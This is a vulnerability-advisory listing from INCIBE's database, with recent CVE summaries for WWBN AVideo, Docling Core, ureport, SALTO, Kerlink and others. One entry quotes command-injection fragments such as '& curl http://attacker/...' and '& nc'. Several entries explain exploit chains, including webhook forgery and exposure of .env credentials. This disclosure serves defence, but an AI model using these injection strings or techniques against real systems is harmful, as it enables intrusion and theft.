Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2026-55173

Publication date:
16/07/2026
WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
Severity CVSS v4.0: Pending analysis
Last modification:
17/07/2026

CVE-2026-57896

Publication date:
16/07/2026
An out-of-bounds read vulnerability in the Productivity Suite allows a <br /> local attacker to trigger kernel memory corruption by sending a crafted <br /> IOCTL request. This could lead to limited information disclosure or <br /> disruption of the affected product.
Severity CVSS v4.0: MEDIUM
Last modification:
17/07/2026

CVE-2026-60073

Publication date:
16/07/2026
An out-of-bounds read in the Productivity Suite allows a physical <br /> attacker to control the length of data sent to a USB device. This can <br /> lead to a system crash or disclosure of kernel memory.
Severity CVSS v4.0: MEDIUM
Last modification:
17/07/2026

CVE-2026-61378

Publication date:
16/07/2026
A divide-by-zero vulnerability in the Productivity Suite allows a local <br /> attacker to cause a division by zero leading to a system crash.
Severity CVSS v4.0: MEDIUM
Last modification:
17/07/2026

CVE-2026-44019

Publication date:
16/07/2026
Docling Core defines core data types and transformations for the document processing application Docling. In versions 2.5.0 and above, prior to 2.74.1, docling-core could allow local file:// image references and accepted inline data: content without a decoded-size limit. In applications that accept untrusted image references, this may allow access to local files readable by the process or excessive memory use from large inline payloads. This issue has been fixed in version 2.74.1.
Severity CVSS v4.0: Pending analysis
Last modification:
16/07/2026

CVE-2026-33731

Publication date:
16/07/2026
WWBN AVideo is an open source video platform. In versions prior to 29.0, the Authorize.Net webhook handler at plugin/AuthorizeNet/webhook.php contains a signature verification bypass that allows an attacker to forge webhook requests with arbitrary payment amounts and target user IDs. By supplying a valid transaction ID from a small legitimate purchase, the attacker bypasses signature validation and credits arbitrary wallet balances to any user account via attacker-controlled payload fields. Three flaws combine into an exploit chain: signature bypass via OR logic (webhook.php:33), payload values override API-fetched values (AuthorizeNet.php:169-171, webhook.php:44-48) and a missing approval check (webhook.php:61-75). By forging payment metadata, an attacker can credit arbitrary amounts to any user&amp;#39;s wallet without a corresponding payment and include a  plans_id  to activate premium subscriptions (webhook.php:86-134), enabling free access to all paid and premium content and causing direct revenue loss to the platform owner. This issue has been fixed in version 29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
17/07/2026

CVE-2026-33692

Publication date:
16/07/2026
WWBN AVideo is an open source video platform. Versions prior to 29.0 expose .env files to unauthenticated users through the official Docker compose configuration. The official docker-compose.yml mounts the entire project root directory as the Apache document root, causing the .env file — which contains database credentials, admin passwords, and infrastructure configuration — to be served as a static file at /.env. No .htaccess rule or Apache configuration blocks access to dotfiles. Exploitation enables direct database access, admin panel takeover, and further lateral movement within the Docker network. This issue has been resolved in version 29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
17/07/2026

CVE-2026-36425

Publication date:
16/07/2026
An issue in OPSWAT AppRemover Driver (ardrv.sys) v2017.10.02.1551 and earlier in IOCTL handler 0x2420031. Any local user can open the device and send process termination requests without privilege validation.
Severity CVSS v4.0: Pending analysis
Last modification:
17/07/2026

CVE-2026-38158

Publication date:
16/07/2026
A SQL injection vulnerability in the /ureport/datasource/previewData component of ureport v2.2.9 allows attackers to access sensitive database information via crafted SQL statements.
Severity CVSS v4.0: Pending analysis
Last modification:
17/07/2026

CVE-2026-11889

Publication date:
16/07/2026
SALTO ProAccess Space software using the tenancy feature / logical <br /> partition is vulnerable to a privilege escalation attack that could <br /> allow an authorized attacker to access any space managed by the affected<br /> product.
Severity CVSS v4.0: HIGH
Last modification:
17/07/2026

CVE-2024-32386

Publication date:
16/07/2026
Directory traversal vulnerability in Kerlink Kerlink Wirnet iStation 868 KerOS v.4.3.3_20200803132042 allows a remote attacker to obtain sensitive information via the SNMP update mechanism.
Severity CVSS v4.0: Pending analysis
Last modification:
17/07/2026

CVE-2024-32387

Publication date:
16/07/2026
An issue in Kerlink Kerlink Wirnet iStation 868 KerOS v.4.3.3_20200803132042 allows a remote attacker to obtain sensitive information via the community string component.
Severity CVSS v4.0: Pending analysis
Last modification:
17/07/2026